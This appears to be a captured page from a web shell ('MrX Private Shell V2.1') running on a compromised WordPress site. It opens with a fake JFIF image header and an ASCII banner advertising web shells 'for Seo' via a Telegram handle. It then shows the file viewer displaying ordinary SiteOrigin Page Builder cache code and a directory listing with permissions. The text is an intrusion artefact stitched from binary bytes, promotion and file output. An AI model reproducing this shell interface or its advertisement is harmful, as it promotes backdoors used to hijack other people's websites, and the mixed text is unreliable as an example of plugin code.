����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
class SiteOrigin_Panels_Cache_Renderer {
function __construct() {
// Clear cache when the Page Builder version changes
add_action( 'siteorigin_panels_version_changed', array( $this, 'clear_cache' ), 10, 0 );
// When we activate/deactivate a plugin or switch themes that might change rendering
add_action( 'activated_plugin', array( $this, 'clear_cache' ), 10, 0 );
add_action( 'deactivated_plugin', array( $this, 'clear_cache' ), 10, 0 );
add_action( 'switch_theme', array( $this, 'clear_cache' ), 10, 0 );
// When settings are saved, this is also a good way to force a cache refresh
add_action( 'siteorigin_panels_save_settings', array( $this, 'clear_cache' ), 10, 0 );
// When a single post is saved
add_action( 'save_post', array( $this, 'clear_cache' ), 10, 2 );
}
/**
* @return SiteOrigin_Panels_Cache_Renderer
*/
static function single() {
static $single;
return empty( $single ) ? $single = new self() : $single;
}
/**
* Clear post meta cache.
*
* Keep this around for a bit in attempt to delete any existing caches.
*/
public function clear_cache(){
delete_post_meta_by_key( 'siteorigin_panels_cache' );
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| data | Folder | 0755 |
|
|
| widgets | Folder | 0755 |
|
|
| admin-dashboard.php | File | 3.81 KB | 0644 |
|
| admin-layouts.php | File | 17.14 KB | 0644 |
|
| admin-widget-dialog.php | File | 5.36 KB | 0644 |
|
| admin-widgets-bundle.php | File | 4.78 KB | 0644 |
|
| admin.php | File | 67.1 KB | 0644 |
|
| cache-renderer.php | File | 1.15 KB | 0644 |
|
| css-builder.php | File | 8.02 KB | 0644 |
|
| error_log | File | 6.62 KB | 0644 |
|
| functions.php | File | 2.69 KB | 0644 |
|
| home.php | File | 1.25 KB | 0644 |
|
| live-editor.php | File | 2.49 KB | 0644 |
|
| post-content-filters.php | File | 2.53 KB | 0644 |
|
| renderer-legacy.php | File | 5.62 KB | 0644 |
|
| renderer.php | File | 37.43 KB | 0644 |
|
| revisions.php | File | 2.76 KB | 0644 |
|
| settings.php | File | 26.11 KB | 0644 |
|
| sidebars-emulator.php | File | 7.46 KB | 0644 |
|
| styles-admin.php | File | 21.19 KB | 0644 |
|
| styles.php | File | 38.92 KB | 0644 |
|
| widget-shortcode.php | File | 3.39 KB | 0644 |
|